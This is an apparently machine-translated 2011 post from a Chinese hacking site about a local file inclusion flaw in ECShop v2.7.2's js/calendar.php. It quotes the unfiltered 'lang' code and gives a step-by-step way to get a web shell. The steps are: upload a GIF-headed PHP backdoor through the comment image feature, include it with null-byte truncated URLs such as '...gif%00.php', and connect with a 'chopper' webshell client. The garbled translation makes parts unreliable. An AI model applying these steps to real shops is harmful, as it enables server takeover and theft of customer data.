ecshop the latest version (v272) the local contains to get SHELL-vulnerability warning-the black bar safety net

ID MYHACK58:62201130886
Type myhack58
Reporter 佚名
Modified 2011-06-15T00:00:00


Looking directly at the code:


$lang = (! empty($_GET['lang']))

? trim($_GET['lang']) : ‘EN’;//no filter, obviously contains a vulnerability

if (! file_exists(‘../languages/’ . $lang . ‘/calendar.php’))


$lang = ‘EN’;


require(dirname(dirname(FILE)) . ‘/data/config.php’);

header(‘Content-type: application/x-javascript; charset=’ . EC_CHARSET);

the include_once(‘../languages/’ . $lang . ‘/calendar.php’);//included here, and need to be truncated

Some time ago, has been hovering in the ecshop website above. Later found the side door of the vulnerability can take the SHELL, simply use the way.

Forged a gif89a header GIF Backdoor file cheat, then register for the Mall account, in the I want to comment there, leave a message upload images, and then use the included directly to get the SHELL to!

Online exp the Url is like this: http://www.*. com/js/calendar. php? lang=../data/feedbackimg/6_20101228vyrpbg. gif%0 0.

Want to take the SHELL you just point the back plus a php, very simple so that you can identify as a php file executing the script.

Such as: js/calendar.php?lang=../data/feedbackimg/309_20110405qzitof.gif%00./1.php

Directly js/calendar.php?lang=../data/feedbackimg/309_20110405qzitof.gif%00.php you can also!

Open your upload the gif pseudo-image after the above vulnerability is to construct the URL <appear E hereinafter the success of the> <appears in Chinese, it fails>

By the way, if you use pop to download, suggest you use a chopper connected. Comparing convenient!

(Pop-up download in Before is not. Might upgrade to a~ however, this vulnerability has no impact on.

If you message the page looking for not the words in the root directory added: user. php? act=message_list

Open this page then you can not use.